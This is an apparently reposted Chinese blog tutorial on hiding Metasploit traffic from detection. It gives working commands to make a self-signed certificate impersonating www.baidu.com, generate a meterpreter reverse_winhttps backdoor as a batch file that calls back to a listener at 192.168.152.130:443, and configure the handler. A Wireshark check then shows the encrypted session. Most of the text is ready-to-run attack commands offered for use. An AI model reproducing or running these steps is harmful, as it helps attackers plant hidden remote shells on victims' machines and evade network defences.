MSF流量加密躲避检测

Posted Tenet@1014

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MSF流量加密躲避检测相关的知识,希望对你有一定的参考价值。

MSF流量加密躲避检测

对于OpenSSL不了解的,可以去看下我上一篇文章

使用Openssl加密

生成证书

这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是怎么回事了

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \\
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" \\
-keyout www.baidu.com.key \\
-out www.baidu.com.crt && \\
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && \\
rm -f www.baidu.com.key www.baidu.com.crt

在这里插入图片描述

MSF生成后门

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.152.130 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o msf_winhttps.bat

在这里插入图片描述

设置监听器

配置监听器时,要用到两个附加选项,目的是告诉处理程序它将使用的证书(与有效负载相同),并在接收到连接时执行SSL证书的验证

HandlerSSLCert

StageVerifySSLCert

set payload windows/meterpreter/reverse_winhttps
set lhost 192.168.152.130
set lport 443
set HandlerSSLCert /root/www.baidu.com.pem(不能中文路径)
set StageVerifySSLCert true

在这里插入图片描述

开启监听后,可以去看看是否开启了https

可以看到此处已经开启了https,并且也可以查看证书

在这里插入图片描述

查看证书
在这里插入图片描述

目标机运行msf_winhttps.bat,成功上线

在这里插入图片描述
在这里插入图片描述

验证是否加密

打开wireshark查看,TLSv1.2,成功加密
在这里插入图片描述

以上是关于MSF流量加密躲避检测的主要内容,如果未能解决你的问题,请参考以下文章

红蓝对抗之流量加密(Openssl加密传输MSF流量加密CS修改profile进行流量加密)

20155320 Exp3 免杀原理与实践

冰蝎动态二进制加密WebShell基于流量侧检测方案

加密流量分析

MSF制作免杀木马

MSF制作免杀木马